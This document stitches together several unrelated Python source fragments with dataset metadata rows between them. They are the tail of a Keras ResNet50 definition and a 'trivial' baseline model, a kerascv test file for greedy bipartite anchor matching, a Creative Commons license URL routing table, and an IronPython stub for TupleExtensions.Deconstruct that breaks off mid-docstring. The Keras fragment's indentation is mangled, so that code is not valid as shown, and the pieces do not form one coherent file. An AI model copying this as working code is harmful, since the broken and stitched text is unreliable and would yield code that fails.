x = identity_block(
x,
3, [512, 512, 2048],
stage=5,
block='b',
use_l2_regularizer=use_l2_regularizer)
x = identity_block(
x,
3, [512, 512, 2048],
stage=5,
block='c',
use_l2_regularizer=use_l2_regularizer)
rm_axes = [1, 2] if backend.image_data_format() == 'channels_last' else [2, 3]
x = layers.Lambda(lambda x: backend.mean(x, rm_axes), name='reduce_mean')(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
  # A softmax that is followed by the model loss cannot be done in float16
  # due to numeric issues. So we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
return models.Model(img_input, x, name='resnet50')
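
# A minimal usage sketch (added for illustration; not part of the original
# module). The optimizer and loss below are assumptions, not prescribed by
# this file:
#
#   model = resnet50(num_classes=1000, batch_size=32)
#   model.compile(
#       optimizer='sgd',
#       loss='sparse_categorical_crossentropy',
#       metrics=['accuracy'])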
def trivial(num_classes,
            batch_size=None,
            use_l2_regularizer=True):
  """Instantiates a trivial conv + batch-norm + pooled dense model.

  Useful as a minimal baseline for input-pipeline and performance testing.
  """
  input_shape = (224, 224, 3)
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Lambda(
lambda x: backend.permute_dimensions(x, (0, 3, 1, 2)),
name='transpose')(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=BATCH_NORM_DECAY,
epsilon=BATCH_NORM_EPSILON,
name='bn_conv1')(
x)
rm_axes = [1, 2] if backend.image_data_format() == 'channels_last' else [2, 3]
x = layers.Lambda(lambda x: backend.mean(x, rm_axes), name='reduce_mean')(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
  # A softmax that is followed by the model loss cannot be done in float16
  # due to numeric issues. So we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
  return models.Model(img_input, x, name='trivial')
| 28.783654 | 80 | 0.636045 | 1,604 | 11,974 | 4.507481 | 0.122195 | 0.127663 | 0.126141 | 0.074689 | 0.835546 | 0.826418 | 0.821024 | 0.821024 | 0.791701 | 0.769433 | 0 | 0.048277 | 0.256138 | 11,974 | 415 | 81 | 28.853012 | 0.763444 | 0.162268 | 0 | 0.892537 | 0 | 0 | 0.044073 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.01791 | 0.002985 | 0.047761 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
413d7681258d94e5b3a839238c2933656744d427 | 11,468 | py | Python | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | tests/kerascv/layers/matchers/greedy_bipartite_test.py | tanzhenyu/keras-cv | b7208ee25735c492ccc171874e34076111dcf637 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import tensorflow as tf
from kerascv.layers.anchor_generators.anchor_generator import AnchorGenerator
from kerascv.layers.matchers.greedy_bipartite import target_assign_func
from kerascv.layers.matchers.greedy_bipartite import target_assign_tf_func
def test_single_gt_best_match():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.14, 0.64, 0.34, 0.84]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    # np.int was removed in NumPy 1.24; the builtin int is the drop-in replacement.
    expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([1, 0, 1, 1]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_no_intersect():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.4, 0.65, 0.6, 0.85]])
ground_truth_labels = tf.constant([[8]])
    # Since the ground truth box does not intersect any anchor, greedy bipartite
    # matching still assigns it, here to the first anchor.
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([0, 1, 1, 1]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_single_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.24, 0.5, 0.74, 1.0]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([1, 0, 1, 0]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_zero_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.24, 0.5, 0.74, 1.0]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors, negative_iou_threshold=1 / 3
)
expected_matched_gt_boxes = np.asarray(
[anchors[0, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([0, 1, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([1, 0, 1, 1]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_four_match():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes,
ground_truth_labels,
anchors,
positive_iou_threshold=1 / 7,
negative_iou_threshold=1 / 8,
)
expected_matched_gt_boxes = np.tile(ground_truth_boxes, (4, 1))
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.tile(ground_truth_labels, (4, 1))
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 1, 1, 1]).astype(int)
    expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_three_negative():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([0, 1, 1, 1]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_single_gt_single_match_three_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors, negative_iou_threshold=1 / 7
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_two_gt_two_matches():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.2],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
# The first box will be matched to the second anchor
# The second box will be matched to the first anchor
ground_truth_boxes = tf.constant([
[0.15, 0.65, 0.35, 0.85],
[0.14, 0.64, 0.34, 0.84],
])
ground_truth_labels = tf.constant([[8], [6]])
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_func(
ground_truth_boxes, ground_truth_labels, anchors
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[1, :], ground_truth_boxes[0, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[1] = ground_truth_labels[0]
expected_matched_gt_labels[0] = ground_truth_labels[1]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 1, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([0, 0, 1, 1]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
def test_tf_single_gt_single_match_three_neutral():
anchor_gen = AnchorGenerator(
image_size=(300, 300),
scales=[0.5],
aspect_ratios=[1.0],
clip_boxes=False,
normalize_coordinates=True,
)
anchors = anchor_gen((2, 2))
ground_truth_boxes = tf.constant([[0.25, 0.25, 0.75, 0.75]])
ground_truth_labels = tf.constant([[8]], dtype=tf.int64)
matched_gt_boxes, matched_gt_labels, positive_mask, negative_mask = target_assign_tf_func(
ground_truth_boxes,
ground_truth_labels,
anchors,
negative_iou_threshold=tf.constant(1 / 7, dtype=tf.float32),
)
expected_matched_gt_boxes = np.asarray(
[ground_truth_boxes[0, :], anchors[1, :], anchors[2, :], anchors[3, :]]
)
np.testing.assert_allclose(expected_matched_gt_boxes, matched_gt_boxes)
expected_matched_gt_labels = np.zeros((4, 1))
expected_matched_gt_labels[0] = ground_truth_labels[0]
np.testing.assert_allclose(expected_matched_gt_labels, matched_gt_labels)
    expected_positive_mask = np.asarray([1, 0, 0, 0]).astype(int)
    expected_negative_mask = np.asarray([0, 0, 0, 0]).astype(int)
np.testing.assert_equal(expected_positive_mask, positive_mask)
np.testing.assert_equal(expected_negative_mask, negative_mask)
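
# A rough sketch of the greedy bipartite idea the tests above exercise: each
# ground truth claims its globally best-IoU anchor, one pair at a time, and
# every claimed row/column is removed before the next pick. This is
# illustrative only; it is not the kerascv implementation under test.
def _greedy_bipartite_sketch(iou):
    """Return {gt_index: anchor_index} for a (num_gt, num_anchors) IoU matrix."""
    iou = np.array(iou, dtype=np.float64, copy=True)
    matches = {}
    for _ in range(iou.shape[0]):
        # Pick the best remaining (gt, anchor) pair by IoU.
        gt, anchor = np.unravel_index(np.argmax(iou), iou.shape)
        matches[int(gt)] = int(anchor)
        iou[gt, :] = -1.0  # this ground truth is consumed
        iou[:, anchor] = -1.0  # this anchor is consumed
    return matches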
| 44.107692 | 94 | 0.712592 | 1,631 | 11,468 | 4.641324 | 0.063765 | 0.096301 | 0.089168 | 0.082034 | 0.942272 | 0.939102 | 0.926024 | 0.926024 | 0.920608 | 0.904888 | 0 | 0.040778 | 0.1703 | 11,468 | 259 | 95 | 44.277992 | 0.754808 | 0.016045 | 0 | 0.739496 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151261 | 1 | 0.037815 | false | 0 | 0.021008 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
417c3118f68a0854a65df1aa56abdef2f232b670 | 8,736 | py | Python | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 6 | 2017-12-25T08:18:43.000Z | 2021-01-02T09:02:59.000Z | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 39 | 2017-11-17T01:59:38.000Z | 2021-12-14T19:14:12.000Z | cc/engine/licenses/routing.py | Abbas-000/cc.engine | eb4b5e5f6c695a16c7ab8bcc52036cf16a0fba22 | [
"MIT"
] | 17 | 2017-12-25T08:18:13.000Z | 2021-04-12T12:50:35.000Z | from routes.route import Route
licenses_routes = [
Route("licenses_index", "/",
controller="cc.engine.licenses.views:licenses_view"),
# MIT / BSD routing
Route("license_deed_mit", "/MIT/",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_bsd", "/BSD/",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_mit", "/MIT/deed",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_mit", "/MIT/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_bsd", "/BSD/deed",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_bsd", "/BSD/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_legalcode_mit_redirect", "/MIT/legalcode",
redirect_to="http://opensource.org/licenses/mit-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_legalcode_bsd_redirect", "/BSD/legalcode",
redirect_to="http://opensource.org/licenses/bsd-license.php",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_mit", "/MIT/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="MIT"),
Route("license_rdf_bsd", "/BSD/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="BSD"),
# publicdomain routing
Route("license_deed_publicdomain", "/publicdomain/",
controller="cc.engine.licenses.views:license_deed_view",
code="publicdomain"),
Route("license_rdf_publicdomain", "/publicdomain/rdf",
controller="cc.engine.licenses.views:license_rdf_view",
code="publicdomain"),
Route("license_deed_explicit_publicdomain",
"/publicdomain/deed", code="publicdomain",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang_publicdomain",
"/publicdomain/deed.{target_lang:[a-zA-Z_-]+}", code="publicdomain",
controller="cc.engine.licenses.views:license_deed_view"),
# GPL redirects and etc
Route("license_deed_gpl", "/GPL/2.0/",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_gpl", "/GPL/2.0/deed",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_gpl", "/GPL/2.0/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_gpl", "/GPL/2.0/rdf",
redirect_to="http://www.gnu.org/licenses/gpl-2.0.rdf",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lgpl", "/LGPL/2.1/",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_explicit_lgpl", "/LGPL/2.1/deed",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_deed_lang_lgpl", "/LGPL/2.1/deed.{target_lang:[a-zA-Z_-]+}",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.html",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
Route("license_rdf_lgpl", "/LGPL/2.1/rdf",
redirect_to="http://www.gnu.org/licenses/lgpl-2.1.rdf",
controller="cc.engine.licenses.views:moved_permanently_redirect"),
# Normal license routing
Route("license_deed",
"/{code:[-a-z+]+}/{version:[0-9.]+}/",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_explicit",
"/{code:[-a-z+]+}/{version:[0-9.]+}/deed",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang",
"/{code:[-a-z+]+}/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_rdf",
"/{code:[-a-z+]+}/{version:[0-9.]+}/rdf",
controller="cc.engine.licenses.views:license_rdf_view"),
Route("license_legalcode",
"/{code:[-a-z+]+}/{version:[0-9.]+}/legalcode",
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("license_legalcode_plain",
"/{code:[-a-z+]+}/{version:[0-9.]+}/legalcode-plain",
controller="cc.engine.licenses.views:license_legalcode_plain_view"),
Route("license_deed_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_jurisdiction_explicit",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/deed",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_deed_lang_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/deed.{target_lang:[a-zA-Z_-]+}",
controller="cc.engine.licenses.views:license_deed_view"),
Route("license_rdf_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/rdf",
controller="cc.engine.licenses.views:license_rdf_view"),
Route("license_legalcode_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/legalcode",
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("license_legalcode_plain_jurisdiction",
"/{code:[-a-z+]+}/{version:[0-9.]+}/{jurisdiction:[a-zA-Z_-]+}/legalcode-plain",
controller="cc.engine.licenses.views:license_legalcode_plain_view"),
Route("license_standard_catcher",
"/{code:[-a-z+]+}/",
controller="cc.engine.licenses.views:license_catcher"),
]
cc0_routes = [
Route("cc0_catcher", "/", code='CC0',
controller="cc.engine.licenses.views:license_catcher"),
Route("cc0_deed", "/{version:[0-9.]+}/",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_deed_explicit", "/{version:[0-9.]+}/deed",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_deed_lang", "/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
code='CC0', controller="cc.engine.licenses.views:license_deed_view"),
Route("cc0_rdf", "/{version:[0-9.]+}/rdf",
code='CC0', controller="cc.engine.licenses.views:license_rdf_view"),
Route("cc0_legalcode", "/{version:[0-9.]+}/legalcode", code='CC0',
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("cc0_legalcode_plain", "/{version:[0-9.]+}/legalcode-plain", code='CC0',
controller="cc.engine.licenses.views:license_legalcode_plain_view")]
mark_routes = [
Route("mark_catcher", "/", code='mark',
controller="cc.engine.licenses.views:license_catcher"),
Route("mark_deed", "/{version:[0-9.]+}/",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_deed_explicit", "/{version:[0-9.]+}/deed",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_deed_lang", "/{version:[0-9.]+}/deed.{target_lang:[a-zA-Z_-]+}",
code='mark', controller="cc.engine.licenses.views:license_deed_view"),
Route("mark_rdf", "/{version:[0-9.]+}/rdf",
code='mark', controller="cc.engine.licenses.views:license_rdf_view"),
Route("mark_legalcode", "/{version:[0-9.]+}/legalcode", code='mark',
controller="cc.engine.licenses.views:license_legalcode_view"),
Route("mark_legalcode_plain",
"/{version:[0-9.]+}/legalcode-plain", code='mark',
controller="cc.engine.licenses.views:license_legalcode_plain_view")]
| 54.943396 | 105 | 0.656479 | 1,085 | 8,736 | 5.058986 | 0.04977 | 0.10931 | 0.163964 | 0.236837 | 0.903261 | 0.87393 | 0.853161 | 0.816907 | 0.777191 | 0.689379 | 0 | 0.012796 | 0.150183 | 8,736 | 158 | 106 | 55.291139 | 0.726563 | 0.009501 | 0 | 0.439716 | 0 | 0.049645 | 0.639413 | 0.474847 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.007092 | 0 | 0.007092 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
41a9031ea1bf58391b018435e6cf7b6a66c70bbe | 11,600 | py | Python | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/System/__init___parts/TupleExtensions.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class TupleExtensions(object):
# no doc
@staticmethod
def Deconstruct(
value,
item1,
item2=None,
item3=None,
item4=None,
item5=None,
item6=None,
item7=None,
item8=None,
item9=None,
item10=None,
item11=None,
item12=None,
item13=None,
item14=None,
item15=None,
item16=None,
item17=None,
item18=None,
item19=None,
item20=None,
item21=None,
):
"""
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19,T20,T21]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19,T20,T21)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18,T19]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18,T19)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11,T12,T13,T14,Tuple[T15,T16,T17,T18]]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11,T12,T13,T14,T15,T16,T17,T18)
Deconstruct[(T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)](value: Tuple[T1,T2,T3,T4,T5,T6,T7,Tuple[T8,T9,T10,T11]]) -> (T1,T2,T3,T4,T5,T6,T7,T8,T9,T10,T11)
